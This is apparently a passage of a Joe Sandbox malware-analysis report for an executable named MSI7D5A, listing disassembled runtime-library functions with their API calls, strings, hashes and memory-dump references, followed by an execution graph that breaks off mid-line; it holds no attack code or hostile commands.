                                                      • Associated: 00000006.00000002.2085130397.0000000000A9C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000006.00000002.2085148614.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_a40000_MSI7D5A.jbxd
                                                      Similarity
                                                      • API ID: Lockitstd::_$Lockit::_Lockit::~_$Find_elemH_prolog3_
                                                      • String ID: 0123456789ABCDEFabcdef-+Xx
                                                      • API String ID: 3042121994-2799312399
                                                      • Opcode ID: 899d8c0b293f3efffb56f4c294f52aa705730a9f348c1d8ad0c1bffa75948fe6
                                                      • Instruction ID: e673e2e58167f042dee03092fcdb38686426ab086878c8891b949882b6ef3881
                                                      • Opcode Fuzzy Hash: 899d8c0b293f3efffb56f4c294f52aa705730a9f348c1d8ad0c1bffa75948fe6
                                                      • Instruction Fuzzy Hash: 27C16F34E04258CBDF25DF64C9517EDBBB2BF55306F948099EC89AB282DB348D89CB50
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00A71A6D Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 194COMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      APIs
                                                      • __startOneArgErrorHandling.LIBCMT ref: 00A71AFD
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2085090627.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                      • Associated: 00000006.00000002.2085076632.0000000000A40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000006.00000002.2085115089.0000000000A87000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000006.00000002.2085130397.0000000000A9C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000006.00000002.2085148614.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_a40000_MSI7D5A.jbxd
                                                      Similarity
                                                      • API ID: ErrorHandling__start
                                                      • String ID: pow
                                                      • API String ID: 3213639722-2276729525
                                                      • Opcode ID: 79dcb12207a561c51b937786c4c7804ce88cb4cbfb02e31b66acd12dab2b48a2
                                                      • Instruction ID: d745f3c4f82553db0bd9c2241f9d15604e16df94536ad223d506c176ded2180c
                                                      • Opcode Fuzzy Hash: 79dcb12207a561c51b937786c4c7804ce88cb4cbfb02e31b66acd12dab2b48a2
                                                      • Instruction Fuzzy Hash: 8A515B71A09101EACB11BB58DE0137E37F4EBE0750F20C959F09E861A5EA358C959B87
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00A61E70 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 182COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2085090627.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                      • Associated: 00000006.00000002.2085076632.0000000000A40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000006.00000002.2085115089.0000000000A87000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000006.00000002.2085130397.0000000000A9C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000006.00000002.2085148614.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_a40000_MSI7D5A.jbxd
                                                      Similarity
                                                      • API ID: __aulldiv
                                                      • String ID: -$0123456789abcdefghijklmnopqrstuvwxyz
                                                      • API String ID: 3732870572-1956417402
                                                      • Opcode ID: b235f2811001c5b9089e5d8e8323c3e0da641ed5d26d00a3eac53625067913c1
                                                      • Instruction ID: 92116bb7ab74ad58a4905c275c8a026841e0336d45d23ebcf1421944865fc69c
                                                      • Opcode Fuzzy Hash: b235f2811001c5b9089e5d8e8323c3e0da641ed5d26d00a3eac53625067913c1
                                                      • Instruction Fuzzy Hash: DD51F130B04285AEDF258FAC8495BBEBFF9AF46341F18446BE891D7281C7758D41CB61
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00A4BD90 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 167COMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      APIs
                                                      • Concurrency::cancel_current_task.LIBCPMT ref: 00A4BF6E
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2085090627.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                      • Associated: 00000006.00000002.2085076632.0000000000A40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000006.00000002.2085115089.0000000000A87000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000006.00000002.2085130397.0000000000A9C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000006.00000002.2085148614.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_a40000_MSI7D5A.jbxd
                                                      Similarity
                                                      • API ID: Concurrency::cancel_current_task
                                                      • String ID: false$true
                                                      • API String ID: 118556049-2658103896
                                                      • Opcode ID: e76fc1492ece1b9aac2b2fae51ca9ba5994907ebd64d54bc5b518b105b37643a
                                                      • Instruction ID: 302623fa5c9c382225c25bd7cd27d74446f9c04e5ee2043b78cc63144faf6d4c
                                                      • Opcode Fuzzy Hash: e76fc1492ece1b9aac2b2fae51ca9ba5994907ebd64d54bc5b518b105b37643a
                                                      • Instruction Fuzzy Hash: 3251B3B5D007489FDB10DFA4C941BEEB7F8FF45304F14826AE805AB641E774A949CBA1
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00A470A0 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 149COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2085090627.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                      • Associated: 00000006.00000002.2085076632.0000000000A40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000006.00000002.2085115089.0000000000A87000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000006.00000002.2085130397.0000000000A9C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000006.00000002.2085148614.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_a40000_MSI7D5A.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: \\?\$\\?\UNC\
                                                      • API String ID: 0-3019864461
                                                      • Opcode ID: 391b36bdd34395a68196e59e0ed5e8a77f2b980d89e6f709f9e60a6fd4000d87
                                                      • Instruction ID: e3e75ed70de866a777ea8b2d6b1c94626b7533a9cd27ff8fc0c9239b1fda686f
                                                      • Opcode Fuzzy Hash: 391b36bdd34395a68196e59e0ed5e8a77f2b980d89e6f709f9e60a6fd4000d87
                                                      • Instruction Fuzzy Hash: A951C074E04244ABDF14DF68C985BEEB7B5FF99344F10461DE401BB290DBB5A988CBA0
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00A5D4FA Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 130COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • __EH_prolog3_GS.LIBCMT ref: 00A5D501
                                                      • _swprintf.LIBCMT ref: 00A5D573
                                                        • Part of subcall function 00A5254E: __EH_prolog3.LIBCMT ref: 00A52555
                                                        • Part of subcall function 00A5254E: std::_Lockit::_Lockit.LIBCPMT ref: 00A5255F
                                                        • Part of subcall function 00A5254E: std::_Lockit::~_Lockit.LIBCPMT ref: 00A525D0
                                                        • Part of subcall function 00A52FC8: __EH_prolog3.LIBCMT ref: 00A52FCF
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2085090627.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                      • Associated: 00000006.00000002.2085076632.0000000000A40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000006.00000002.2085115089.0000000000A87000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000006.00000002.2085130397.0000000000A9C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000006.00000002.2085148614.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_a40000_MSI7D5A.jbxd
                                                      Similarity
                                                      • API ID: H_prolog3Lockitstd::_$H_prolog3_Lockit::_Lockit::~__swprintf
                                                      • String ID: %.0Lf
                                                      • API String ID: 3050236999-1402515088
                                                      • Opcode ID: 920677bd51f7e6bceac6d77ecd5b633014a1dee611049a48266c24f85c334eb5
                                                      • Instruction ID: 0a239ad0e94fff9a14f3017fa19e3cf219a6be5a74be61273b76282005fb294b
                                                      • Opcode Fuzzy Hash: 920677bd51f7e6bceac6d77ecd5b633014a1dee611049a48266c24f85c334eb5
                                                      • Instruction Fuzzy Hash: E6418B71E00308ABCF05EFE0C945ADDBBB5FF48315F204549E846AB291EB35991ACF90
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00A5D79E Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 130COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • __EH_prolog3_GS.LIBCMT ref: 00A5D7A5
                                                      • _swprintf.LIBCMT ref: 00A5D817
                                                        • Part of subcall function 00A48610: std::_Lockit::_Lockit.LIBCPMT ref: 00A48657
                                                        • Part of subcall function 00A48610: std::_Lockit::_Lockit.LIBCPMT ref: 00A48679
                                                        • Part of subcall function 00A48610: std::_Lockit::~_Lockit.LIBCPMT ref: 00A486A1
                                                        • Part of subcall function 00A48610: std::_Lockit::~_Lockit.LIBCPMT ref: 00A4880E
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2085090627.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                      • Associated: 00000006.00000002.2085076632.0000000000A40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000006.00000002.2085115089.0000000000A87000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000006.00000002.2085130397.0000000000A9C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000006.00000002.2085148614.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_a40000_MSI7D5A.jbxd
                                                      Similarity
                                                      • API ID: Lockitstd::_$Lockit::_Lockit::~_$H_prolog3__swprintf
                                                      • String ID: %.0Lf
                                                      • API String ID: 1487807907-1402515088
                                                      • Opcode ID: 3ce75bf193679f87f1dbc2c0ff8ad70820f7cdaaec44985b69a8e7911741e759
                                                      • Instruction ID: 9776237fde429fa35129f51f54e3d9f18305aff9c6326c95b798cb1614230eaa
                                                      • Opcode Fuzzy Hash: 3ce75bf193679f87f1dbc2c0ff8ad70820f7cdaaec44985b69a8e7911741e759
                                                      • Instruction Fuzzy Hash: B8418875E00208EBCF05EFE0D945ADEBBB5FF48310F204449E846AB291EB35991ACF90
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00A61887 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 128COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • __EH_prolog3_GS.LIBCMT ref: 00A6188E
                                                      • _swprintf.LIBCMT ref: 00A61900
                                                        • Part of subcall function 00A49270: std::_Lockit::_Lockit.LIBCPMT ref: 00A492A0
                                                        • Part of subcall function 00A49270: std::_Lockit::_Lockit.LIBCPMT ref: 00A492C2
                                                        • Part of subcall function 00A49270: std::_Lockit::~_Lockit.LIBCPMT ref: 00A492EA
                                                        • Part of subcall function 00A49270: std::_Lockit::~_Lockit.LIBCPMT ref: 00A49422
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2085090627.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                      • Associated: 00000006.00000002.2085076632.0000000000A40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000006.00000002.2085115089.0000000000A87000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000006.00000002.2085130397.0000000000A9C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000006.00000002.2085148614.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_a40000_MSI7D5A.jbxd
                                                      Similarity
                                                      • API ID: Lockitstd::_$Lockit::_Lockit::~_$H_prolog3__swprintf
                                                      • String ID: %.0Lf
                                                      • API String ID: 1487807907-1402515088
                                                      • Opcode ID: c8f76fc5dfd552cf0851fe7d642cc4fa23224d3e28dca81f9607ec5d5507906d
                                                      • Instruction ID: bec9a5a4598f83622461a0589cac4d7b6dd2a0b10e4e1755dcd77748fb9f64bf
                                                      • Opcode Fuzzy Hash: c8f76fc5dfd552cf0851fe7d642cc4fa23224d3e28dca81f9607ec5d5507906d
                                                      • Instruction Fuzzy Hash: DD416A75E00308ABCF05EFE4C955ADEBBB5FF48310F204449E856AB291DB759915CF90
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00A66059 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 112COMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      APIs
                                                      • EncodePointer.KERNEL32(00000000,?,00000000,1FFFFFFF), ref: 00A6607E
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2085090627.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                      • Associated: 00000006.00000002.2085076632.0000000000A40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000006.00000002.2085115089.0000000000A87000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000006.00000002.2085130397.0000000000A9C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000006.00000002.2085148614.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_a40000_MSI7D5A.jbxd
                                                      Similarity
                                                      • API ID: EncodePointer
                                                      • String ID: MOC$RCC
                                                      • API String ID: 2118026453-2084237596
                                                      • Opcode ID: 6f866f3731f4d053a67c6dc54c72dc16a52435d6e612b7e9be673231f99cefcc
                                                      • Instruction ID: 11fd3558f90e377db6cff76fd52783a59ec0d91cd48c63e6dfc64546503f8d86
                                                      • Opcode Fuzzy Hash: 6f866f3731f4d053a67c6dc54c72dc16a52435d6e612b7e9be673231f99cefcc
                                                      • Instruction Fuzzy Hash: 37419A32900209EFCF15DF98CD81AEEBBB5FF49300F188259FA18A7212D3359951DB50
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00A5DF8F Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 100COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2085090627.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                      • Associated: 00000006.00000002.2085076632.0000000000A40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000006.00000002.2085115089.0000000000A87000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000006.00000002.2085130397.0000000000A9C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000006.00000002.2085148614.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_a40000_MSI7D5A.jbxd
                                                      Similarity
                                                      • API ID: H_prolog3___cftoe
                                                      • String ID: !%x
                                                      • API String ID: 855520168-1893981228
                                                      • Opcode ID: 209d88e90d8cce1f43a426c04ca053d824e172f991294305675dbedc1511fea1
                                                      • Instruction ID: 41c3094dbad220842089874b18ea68e9fa7ad07545be2a7d8de09ae6b15dd12b
                                                      • Opcode Fuzzy Hash: 209d88e90d8cce1f43a426c04ca053d824e172f991294305675dbedc1511fea1
                                                      • Instruction Fuzzy Hash: F7318C71D0020DEBDF08DF94E981AEEB7B6FF48305F104419F805A7251DB75AA49CB64
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00A619FA Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 98COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2085090627.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                      • Associated: 00000006.00000002.2085076632.0000000000A40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000006.00000002.2085115089.0000000000A87000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000006.00000002.2085130397.0000000000A9C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000006.00000002.2085148614.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_a40000_MSI7D5A.jbxd
                                                      Similarity
                                                      • API ID: H_prolog3___cftoe
                                                      • String ID: !%x
                                                      • API String ID: 855520168-1893981228
                                                      • Opcode ID: d985e33b0682829007e8ebc7a6a4b93f78306be38277a22da3aa428199fe8a0b
                                                      • Instruction ID: 65ac2309db00f9166dbd44b59e9a50cacea5509607d537f6c67fc96f1ef5c3ff
                                                      • Opcode Fuzzy Hash: d985e33b0682829007e8ebc7a6a4b93f78306be38277a22da3aa428199fe8a0b
                                                      • Instruction Fuzzy Hash: 39319C72D15248AFEF04DFD4D980AEEBBB5EF18340F140019F844A7242D7359A46CBA0
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00A45F40 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 66COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • ConvertSidToStringSidW.ADVAPI32(?,00000000), ref: 00A45F86
                                                      • LocalFree.KERNEL32(00000000,Invalid SID,0000000B,?,00000000,838A949E), ref: 00A45FF6
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2085090627.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                      • Associated: 00000006.00000002.2085076632.0000000000A40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000006.00000002.2085115089.0000000000A87000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000006.00000002.2085130397.0000000000A9C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000006.00000002.2085148614.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_a40000_MSI7D5A.jbxd
                                                      Similarity
                                                      • API ID: ConvertFreeLocalString
                                                      • String ID: Invalid SID
                                                      • API String ID: 3201929900-130637731
                                                      • Opcode ID: 0c95fd775913bcc1fd8af235d5bdfa9217ef126df944ea7cf0c69f38e064f998
                                                      • Instruction ID: a1d9764b63dc0603a4c7be998ad0c753c8ed10f7b0c76056f3984035541829a9
                                                      • Opcode Fuzzy Hash: 0c95fd775913bcc1fd8af235d5bdfa9217ef126df944ea7cf0c69f38e064f998
                                                      • Instruction Fuzzy Hash: DF219074A04605DBDB14DFA8C855BAFBBF8FF84714F10491DE402A7380D7B9AA098BD1
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00A49070 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 60COMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      APIs
                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 00A4909B
                                                      • std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 00A490FE
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2085090627.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                      • Associated: 00000006.00000002.2085076632.0000000000A40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000006.00000002.2085115089.0000000000A87000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000006.00000002.2085130397.0000000000A9C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000006.00000002.2085148614.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_a40000_MSI7D5A.jbxd
                                                      Similarity
                                                      • API ID: std::_$Locinfo::_Locinfo_ctorLockitLockit::_
                                                      • String ID: bad locale name
                                                      • API String ID: 3988782225-1405518554
                                                      • Opcode ID: 677b2cb4de5b2bb6f018f3a8fbd7c543a5e0014207bb3f67f472078b2dee7e3f
                                                      • Instruction ID: d9fd0387ed894d2c95adfe24196c5569a2ff646afb0f348ca862a9392669ffd3
                                                      • Opcode Fuzzy Hash: 677b2cb4de5b2bb6f018f3a8fbd7c543a5e0014207bb3f67f472078b2dee7e3f
                                                      • Instruction Fuzzy Hash: E121C070905B84EED721CFA8C904B4BBFF4EF19710F108A9EE49597781D3B5A608CBA1
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00A4F098 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 57COMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2085090627.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                      • Associated: 00000006.00000002.2085076632.0000000000A40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000006.00000002.2085115089.0000000000A87000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000006.00000002.2085130397.0000000000A9C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000006.00000002.2085148614.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_a40000_MSI7D5A.jbxd
                                                      Similarity
                                                      • API ID: H_prolog3_
                                                      • String ID: false$true
                                                      • API String ID: 2427045233-2658103896
                                                      • Opcode ID: ac625925bf011da7a6f878236f75ea06937352f9ee4a97f446233488db980f2d
                                                      • Instruction ID: 76d8d1a7eecd27e1aa510a8019b0050787bdccee3f013621365bdeb158c26d23
                                                      • Opcode Fuzzy Hash: ac625925bf011da7a6f878236f75ea06937352f9ee4a97f446233488db980f2d
                                                      • Instruction Fuzzy Hash: 011190B5D41744AECB21EFB4D841B9AB7F4AF45300F04C92AE5A69B642EB30E605CB60
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00A44070 Relevance: 5.2, APIs: 4, Instructions: 189memoryCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • LocalFree.KERNEL32(00000000,00A44261,00A84400,000000FF,838A949E,00000000,?,00000000,?,?,?,00A84400,000000FF,?,00A43A75,?), ref: 00A44096
                                                      • LocalAlloc.KERNEL32(00000040,40000022,838A949E,?,?,00000000,?,?,?,?,?,?,?,?,00000000), ref: 00A44154
                                                      • LocalAlloc.KERNEL32(00000040,3FFFFFFF,838A949E,?,?,00000000,?,?,?,?,?,?,?,?,00000000), ref: 00A44177
                                                      • LocalFree.KERNEL32(?,?,?,?,?,?,00000000,?,?,?,?,?,?,?,?), ref: 00A44217
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2085090627.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                      • Associated: 00000006.00000002.2085076632.0000000000A40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000006.00000002.2085115089.0000000000A87000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000006.00000002.2085130397.0000000000A9C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000006.00000002.2085148614.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_a40000_MSI7D5A.jbxd
                                                      Similarity
                                                      • API ID: Local$AllocFree
                                                      • String ID:
                                                      • API String ID: 2012307162-0
                                                      • Opcode ID: 96f8466751beb27a1d2ab48c45f400de4db5b7fe8d9c850a3e063190a5f8841a
                                                      • Instruction ID: df944c0ff3b7e13589a40271320621cd239f99840e4c383428ef98d3adf7a727
                                                      • Opcode Fuzzy Hash: 96f8466751beb27a1d2ab48c45f400de4db5b7fe8d9c850a3e063190a5f8841a
                                                      • Instruction Fuzzy Hash: 2E519075A002059FDB18DFACC985BAEBBB5FB88350F24462DF925E7280D771AD41CB90
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00A41D80 Relevance: 5.2, APIs: 4, Instructions: 171memoryCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • LocalAlloc.KERNEL32(00000040,80000022,00000000,?,00000000), ref: 00A41E01
                                                      • LocalAlloc.KERNEL32(00000040,7FFFFFFF,00000000,?,00000000), ref: 00A41E21
                                                      • LocalFree.KERNEL32(7FFFFFFE,?,00000000), ref: 00A41EA7
                                                      • LocalFree.KERNEL32(00000001,838A949E,00000000,00000000,00A83C40,000000FF,?,00000000), ref: 00A41F2D
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2085090627.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                      • Associated: 00000006.00000002.2085076632.0000000000A40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000006.00000002.2085115089.0000000000A87000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000006.00000002.2085130397.0000000000A9C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000006.00000002.2085148614.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_a40000_MSI7D5A.jbxd
                                                      Similarity
                                                      • API ID: Local$AllocFree
                                                      • String ID:
                                                      • API String ID: 2012307162-0
                                                      • Opcode ID: 82f84a27c77313ac04dd58b91bda332bce3b4a9c74726f434d9c3dea649067d6
                                                      • Instruction ID: 039dcc580f10848d195d865a9734f3848e526916efc53d9eda52d960a58020f3
                                                      • Opcode Fuzzy Hash: 82f84a27c77313ac04dd58b91bda332bce3b4a9c74726f434d9c3dea649067d6
                                                      • Instruction Fuzzy Hash: 9B51047AA042159FC715DF68DC81A6BB7E8FF89360F100B2EF866D7290DB30D9448B91
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Execution Graph

                                                      Execution Coverage:3.3%
                                                      Dynamic/Decrypted Code Coverage:0%
                                                      Signature Coverage:0.1%
                                                      Total number of Nodes:1293
                                                      Total number of Limit Nodes:36
                                                      execution_graph 75520 7ff73ae621fc 75521 7ff73ae6221f 75520->75521 75524 7ff73ae7f8b0 75521->75524 75523 7ff73ae63283 75525 7ff73ae7f8d7 75524->75525 75527 7ff73ae7fb04 strrchr 75525->75527 75528 7ff73ae7fb0b wcsxfrm 75525->75528 75531 7ff73ae7f8fa wcsxfrm 75525->75531 75529 7ff73ae7f941 wcsxfrm 75527->75529 75547 7ff73ae70950 15 API calls strrchr 75527->75547 75528->75527 75546 7ff73ae70a70 15 API calls 2 library calls 75528->75546 75529->75523 75531->75527 75531->75529 75532 7ff73ae7fa6d 75531->75532 75535 7ff73ae7fa81 75531->75535 75544 7ff73ae70950 15 API calls strrchr 75532->75544 75534 7ff73ae7fa7f 75538 7ff73ae7d290 75534->75538 75535->75534 75545 7ff73ae70950 15 API calls strrchr 75535->75545 75539 7ff73ae7d2b2 __ExceptionPtrDestroy 75538->75539 75543 7ff73ae7d321 __ExceptionPtrDestroy 75539->75543 75548 7ff73ae7e560 75539->75548 75541 7ff73ae7d30d 75552 7ff73ae7d720 15 API calls 3 library calls 75541->75552 75543->75527 75544->75534 75545->75534 75546->75527 75547->75529 75550 7ff73ae7e592 __ExceptionPtrDestroy 75548->75550 75553 7ff73ae7caf0 75550->75553 75551 7ff73ae7e691 _handle_error 75551->75541 75552->75543 75554 7ff73ae7cb4b 75553->75554 75566 7ff73ae7cbba __ExceptionPtrDestroy 75553->75566 75555 7ff73ae7cb6a 75554->75555 75575 7ff73ae70950 15 API calls strrchr 75554->75575 75557 7ff73ae7cc29 75555->75557 75560 7ff73ae7cb89 75555->75560 75570 7ff73ae78d00 75557->75570 75562 7ff73ae78d00 _free_nolock 15 API calls 75560->75562 75561 7ff73ae7cec5 __ExceptionPtrDestroy 75561->75551 75562->75566 75563 7ff73ae7cde6 75565 7ff73ae78d00 _free_nolock 15 API calls 75563->75565 75569 7ff73ae7ce28 __ExceptionPtrDestroy 75563->75569 75565->75569 75568 